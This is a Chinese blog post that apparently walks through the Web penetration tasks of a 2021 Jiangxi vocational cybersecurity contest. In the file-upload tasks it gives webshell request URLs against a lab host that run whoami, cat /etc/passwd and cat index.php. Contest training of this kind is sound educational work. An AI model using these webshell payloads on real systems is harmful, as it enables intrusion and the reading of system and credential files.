江西省省赛中职网络安全-Web渗透测试

本文详细介绍了2021年江西省职业院校技能大赛“网络安全”项目中涉及的Web渗透测试任务,包括登录安全加固、系统漏洞利用、流量分析等多个环节。参赛者需使用Kali Linux对靶机进行渗透,寻找并利用文件上传漏洞,以获取WEB权限,如通过WHOAMI命令验证权限,或通过查看系统文件获取特定用户信息等。
摘要由CSDN通过智能技术生成

2021年职业院校技能大赛“网络安全”项目
江西省比赛任务书
一、竞赛时间
总计:420分钟
二、竞赛阶段
竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值
A模块 A-1 登录安全加固 180分钟 200分
A-2 Web安全加固(Web)
A-3 流量完整性保护与事件监控(Web,Log)
A-4 防火墙策略
A-5 Windows操作系统安全配置
A-6 Linux操作系统安全配置
B模块 B-1 系统漏洞利用与提权 400分
B-2 Linux操作系统渗透测试
B-3 应用服务漏洞扫描与利用
B-4 SQL注入测试(PL)
B-5 应急响应
B-6 流量分析
B-7 渗透测试
B-8 Web渗透测试
B-9 Windows操作系统渗透测试
B-10 网页渗透-21
午餐 午餐 60分钟 0
C、D模块 C模块 CTF夺旗-攻击 180分钟 200分
D模块 CTF夺旗-防御 200分
任务环境说明:
 服务器场景:Server03
 服务器场景操作系统:未知(关闭连接)

  1. 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag提交(如:点击超链接查看上传文件)
    写入GET马进行文件上传
    在这里插入图片描述

上传成功后会回显字符串
在这里插入图片描述

  1. 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用WHOAMI获取WEB当前的用户权限,并作为Flag进行提交;
    按照视频所渗透即可
    传进去GET 木马 直接 whoami 查看用户权限即可
    GET马 payload 构设
    http://172.16.1.113/uploads/uploads/webshell.php?cmd=system(whoami);
  2. 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为Flag进行提交;
    传进去GET 木马 直接 cat /etc/passwd 查看id为5的用户即可
    GET马 payload 构设
    http://172.16.1.113/uploads/uploads/webshell.php?cmd=system(cat /etc/passwd);
  3. 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令查看后台首页文件,将该文件的第二行的所有字符串作为Flag进行提交;
    cat index.php
    然后找到第二行的所有字符串即可
    GET马 payload 构设
    http://172.16.1.113/uploads/uploads/webshell.php?cmd=system(cat index.php);
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值